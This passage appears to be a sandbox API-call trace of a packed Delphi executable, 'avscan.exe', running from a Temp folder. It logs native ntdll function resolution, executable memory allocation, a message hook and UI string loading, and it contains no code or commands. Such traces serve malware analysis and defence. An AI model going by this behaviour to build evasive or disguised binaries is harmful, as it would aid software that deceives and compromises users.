(hModule=0x77a60000, lpProcName="ZwQuerySection") returned 0x77a80040 [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSection") returned 0x77a7fc70 [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryFullAttributesFile") returned 0x77a8132c [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryObject") returned 0x77a7f9e8 [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFile") returned 0x77a7fd88 [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenSection") returned 0x77a7fdb8 [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDuplicateObject") returned 0x77a7fe34 [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77a7ff7c [0150.554] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteFile") returned 0x77a809d4 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLockFile") returned 0x77a80e44 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnlockFile") returned 0x77a81ea8 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwTerminateProcess") returned 0x77a7fca0 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKey") returned 0x77a7fa18 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateValueKey") returned 0x77a7fa30 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryKey") returned 0x77a7fa80 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryValueKey") returned 0x77a7fa98 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateKey") returned 0x77a7fb30 [0150.555] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateKey") returned 0x77a7fd3c [0150.556] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetValueKey") returned 0x77a801b4 [0150.556] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteKey") returned 0x77a809ec [0150.556] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteValueKey") returned 0x77a80a34 [0150.556] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushKey") returned 0x77a80b70 [0150.556] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey") returned 0x77a80dfc [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey2") returned 0x77a80e14 [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeKey") returned 0x77a80f60 [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryMultipleValueKey") returned 0x77a8146c [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReplaceKey") returned 0x77a81738 [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwRestoreKey") returned 0x77a817d0 [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSaveKey") returned 0x77a81864 [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationKey") returned 0x77a81a48 [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnloadKey") returned 0x77a81e60 [0150.557] GetProcAddress (hModule=0x77a60000, lpProcName="ZwAccessCheck") returned 0x77a80218 [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwExtendSection") returned 0x77a80b0c [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFsControlFile") returned 0x77a7fde8 [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77a80f48 [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySecurityObject") returned 0x77a81518 [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetSecurityObject") returned 0x77a81b8c [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetVolumeInformationFile") returned 0x77a81c8c [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKeyEx") returned 0x77a81008 [0150.558] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcess") returned 0x77a80804 [0150.559] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcessEx") returned 0x77a7ffdc [0150.559] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateUserProcess") returned 0x77a8090c [0150.559] GetProcAddress (hModule=0x77a60000, lpProcName="ZwResumeThread") returned 0x77a80058 [0150.559] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateThread") returned 0x77a7fff4 [0150.559] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationProcess") returned 0x77a7fac8 [0150.559] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVirtualMemory") returned 0x77a7fbc8 [0150.559] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeviceIoControlFile") returned 0x77a7f8fc [0150.559] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0150.560] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0150.560] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationObject") returned 0x77a80154 [0150.560] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForMultipleObjects") returned 0x77a80138 [0150.560] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForSingleObject") returned 0x77a7f8ac [0150.560] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCopyFileChunk") returned 0x0 [0150.560] VirtualFree (lpAddress=0x310000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0150.560] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0150.560] GetProcAddress (hModule=0x77a60000, lpProcName="ZwProtectVirtualMemory") returned 0x77a80028 [0150.561] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0150.561] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0150.561] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0150.561] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0150.561] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0150.561] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0150.561] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0150.561] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0150.562] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0150.562] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0150.562] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0150.562] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0150.618] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3063144682262) returned 1 [0150.619] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x1) returned 0x320000 [0150.621] SysReAllocStringLen (in: pbstr=0x54bf5c*=0x0, psz="enigma_ide.dll", len=0xe | out: pbstr=0x54bf5c*="enigma_ide.dll") returned 1 [0150.631] GetDC (hWnd=0x0) returned 0xc010b3c [0150.631] GetDeviceCaps (hdc=0xc010b3c, index=90) returned 96 [0150.631] ReleaseDC (hWnd=0x0, hDC=0xc010b3c) returned 1 [0150.641] GetDC (hWnd=0x0) returned 0xc010b3c [0150.642] GetDeviceCaps (hdc=0xc010b3c, index=104) returned 0 [0150.642] ReleaseDC (hWnd=0x0, hDC=0xc010b3c) returned 1 [0150.642] CreatePalette (plpal=0x28fac0) returned 0x3080be8 [0150.642] GetStockObject (i=7) returned 0x1b00017 [0150.642] GetStockObject (i=5) returned 0x1900015 [0150.642] GetStockObject (i=13) returned 0x18a002e [0150.642] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0150.642] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0150.962] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x75980000 [0151.048] LoadStringA (in: hInstance=0x42d000, uID=0xff26, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff25, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff24, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff23, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff22, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff21, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff20, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff3f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff3e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff3d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff3c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff3b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff3a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff39, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0151.049] LoadStringA (in: hInstance=0x42d000, uID=0xff38, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0151.050] LoadStringA (in: hInstance=0x42d000, uID=0xff37, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0151.050] LoadStringA (in: hInstance=0x42d000, uID=0xff36, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0151.050] LoadStringA (in: hInstance=0x42d000, uID=0xff35, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0151.337] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc112 [0151.338] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc1be [0151.339] GetCurrentThreadId () returned 0xba4 [0151.392] GlobalAddAtomA (lpString="EnigmaWndProcPtr0040000000000BA4") returned 0xc160 [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfee1, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfee0, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfeff, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfefe, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfefd, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfefc, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfefb, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfefa, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0151.527] LoadStringA (in: hInstance=0x42d000, uID=0xfef9, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef8, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef7, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef6, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef5, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef4, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef3, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef2, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef1, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xfef0, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xff0f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xff0e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xff0d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xff0c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xff0b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0151.528] LoadStringA (in: hInstance=0x42d000, uID=0xff0a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff09, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff08, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff07, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff06, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff05, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff04, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff03, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff02, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff01, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff00, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff1f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff1e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff1d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff1c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff1b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0151.529] LoadStringA (in: hInstance=0x42d000, uID=0xff1a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0151.530] LoadStringA (in: hInstance=0x42d000, uID=0xff19, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0151.530] LoadStringA (in: hInstance=0x42d000, uID=0xff18, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0151.530] LoadStringA (in: hInstance=0x42d000, uID=0xff17, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0151.530] LoadStringA (in: hInstance=0x42d000, uID=0xff16, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0151.530] LoadStringA (in: hInstance=0x42d000, uID=0xff15, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0151.530] LoadStringA (in: hInstance=0x42d000, uID=0xff14, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0151.530] LoadStringA (in: hInstance=0x42d000, uID=0xff13, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0151.583] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1bc [0151.584] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc076 [0151.745] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75410000 [0151.746] GetProcAddress (hModule=0x75410000, lpProcName="InitializeFlatSB") returned 0x7544266f [0151.746] GetProcAddress (hModule=0x75410000, lpProcName="UninitializeFlatSB") returned 0x75442542 [0151.746] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollProp") returned 0x75441d29 [0151.746] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollProp") returned 0x7544238d [0151.746] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_EnableScrollBar") returned 0x754420c9 [0151.746] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_ShowScrollBar") returned 0x75441fdb [0151.746] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollRange") returned 0x75441e8d [0151.747] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollInfo") returned 0x75441f0f [0151.747] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollPos") returned 0x75441ccd [0151.747] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollPos") returned 0x7544216d [0151.747] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollInfo") returned 0x754422be [0151.747] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollRange") returned 0x754421e2 [0151.813] GetModuleHandleA (lpModuleName="User32.dll") returned 0x75980000 [0151.813] GetProcAddress (hModule=0x75980000, lpProcName="SetLayeredWindowAttributes") returned 0x759bec88 [0151.813] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc075 [0152.003] GetVersion () returned 0x1db10106 [0152.003] GetCurrentProcessId () returned 0xbac [0154.538] GlobalAddAtomA (lpString="EnigmaDelphi00000BAC") returned 0xc15f [0154.538] GetCurrentThreadId () returned 0xba4 [0154.538] GlobalAddAtomA (lpString="EnigmaControlOfs0040000000000BA4") returned 0xc15e [0154.538] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000BA4") returned 0xc1da [0154.539] GetProcAddress (hModule=0x75980000, lpProcName="GetMonitorInfoA") returned 0x759a4413 [0154.539] GetProcAddress (hModule=0x75980000, lpProcName="GetSystemMetrics") returned 0x75997d2f [0154.539] GetSystemMetrics (nIndex=19) returned 1 [0154.559] GetSystemMetrics (nIndex=75) returned 1 [0154.559] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2ad188c, fWinIni=0x0 | out: pvParam=0x2ad188c) returned 1 [0154.752] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0154.752] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0154.752] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x0 [0154.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0154.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0154.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0154.755] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x0 [0154.755] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x0 [0154.755] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x0 [0154.755] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x0 [0154.755] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x0 [0154.755] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x0 [0154.755] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0154.755] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0154.755] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0154.756] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0154.756] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0154.756] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0154.756] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0154.756] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0154.756] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0154.756] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0154.756] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0154.756] GetDC (hWnd=0x0) returned 0x9010c2a [0154.757] GetDeviceCaps (hdc=0x9010c2a, index=90) returned 96 [0154.757] ReleaseDC (hWnd=0x0, hDC=0x9010c2a) returned 1 [0154.757] GetProcAddress (hModule=0x75980000, lpProcName="EnumDisplayMonitors") returned 0x759a451a [0154.757] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4bd66c, dwData=0x2ad1ad8) returned 1 [0154.809] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x28fe27, fWinIni=0x0 | out: pvParam=0x28fe27) returned 1 [0154.809] CreateFontIndirectA (lplf=0x28fe27) returned 0x60a0c3b [0154.861] GetObjectA (in: h=0x60a0c3b, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0154.863] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x28fcd3, fWinIni=0x0 | out: pvParam=0x28fcd3) returned 1 [0154.863] CreateFontIndirectA (lplf=0x28fdaf) returned 0x30a0c3c [0154.863] GetObjectA (in: h=0x30a0c3c, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0154.864] CreateFontIndirectA (lplf=0x28fd73) returned 0xa0a0c38 [0154.864] GetObjectA (in: h=0xa0a0c38, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0155.055] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0155.056] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28fd87, nSize=0x100 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0155.056] OemToCharA (in: pSrc="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", pDst=0x28fd87 | out: pDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0155.324] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x330000 [0155.325] GetKeyboardLayoutList (in: nBuff=64, lpList=0x28fd08 | out: lpList=0x28fd08) returned 1 [0155.869] GetModuleHandleA (lpModuleName="USER32") returned 0x75980000 [0155.869] GetProcAddress (hModule=0x75980000, lpProcName="AnimateWindow") returned 0x759ab531 [0156.020] SysReAllocStringLen (in: pbstr=0x54d844*=0x0, psz="Help", len=0x4 | out: pbstr=0x54d844*="Help") returned 1 [0156.020] SysReAllocStringLen (in: pbstr=0x54d840*=0x0, psz="YesToAll", len=0x8 | out: pbstr=0x54d840*="YesToAll") returned 1 [0156.020] SysReAllocStringLen (in: pbstr=0x54d83c*=0x0, psz="NoToAll", len=0x7 | out: pbstr=0x54d83c*="NoToAll") returned 1 [0156.020] SysReAllocStringLen (in: pbstr=0x54d838*=0x0, psz="All", len=0x3 | out: pbstr=0x54d838*="All") returned 1 [0156.020] SysReAllocStringLen (in: pbstr=0x54d834*=0x0, psz="Ignore", len=0x6 | out: pbstr=0x54d834*="Ignore") returned 1 [0156.020] SysReAllocStringLen (in: pbstr=0x54d830*=0x0, psz="Retry", len=0x5 | out: pbstr=0x54d830*="Retry") returned 1 [0156.020] SysReAllocStringLen (in: pbstr=0x54d82c*=0x0, psz="Abort", len=0x5 | out: pbstr=0x54d82c*="Abort") returned 1 [0156.020] SysReAllocStringLen (in: pbstr=0x54d828*=0x0, psz="Cancel", len=0x6 | out: pbstr=0x54d828*="Cancel") returned 1 [0156.020] SysReAllocStringLen (in: pbstr=0x54d824*=0x0, psz="OK", len=0x2 | out: pbstr=0x54d824*="OK") returned 1 [0156.021] SysReAllocStringLen (in: pbstr=0x54d820*=0x0, psz="No", len=0x2 | out: pbstr=0x54d820*="No") returned 1 [0156.021] SysReAllocStringLen (in: pbstr=0x54d81c*=0x0, psz="Yes", len=0x3 | out: pbstr=0x54d81c*="Yes") returned 1 [0156.070] GetTickCount () returned 0x1d0ef47 [0156.070] GetTickCount () returned 0x1d0ef47 [0156.072] GetCurrentThreadId () returned 0xba4 [0156.124] SetWindowsHookExW (idHook=3, lpfn=0x4e67b8, hmod=0x0, dwThreadId=0xba4) returned 0xd019d [0156.233] RegisterClipboardFormatA (lpszFormat="TntUnicodeVcl.DestroyWindow") returned 0xc109 [0156.284] VirtualQuery (in: lpAddress=0x4ce37c, lpBuffer=0x28fe64, dwLength=0x1c | out: lpBuffer=0x28fe64*(BaseAddress=0x4ce000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6fc000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0156.285] GetCurrentProcessId () returned 0xbac [0156.285] GetCurrentThreadId () returned 0xba4 [0156.285] GlobalAddAtomA (lpString="EnigmaDelphi00000BAC") returned 0xc15f [0156.337] GlobalAddAtomA (lpString="EnigmaControlOfs0040000000000BA4") returned 0xc15e [0156.451] LoadCursorA (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0156.451] DestroyCursor (hCursor=0x0) returned 0 [0156.509] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3063733778743) returned 1 [0156.782] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xd0 [0156.782] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd4 [0157.696] GetLastError () returned 0x0 [0157.696] SetLastError (dwErrCode=0x0) [0157.861] GetLastError () returned 0x0 [0157.862] SetLastError (dwErrCode=0x0) [0157.862] GetLastError () returned 0x0 [0157.862] SetLastError (dwErrCode=0x0) [0157.862] GetLastError () returned 0x0 [0157.862] SetLastError 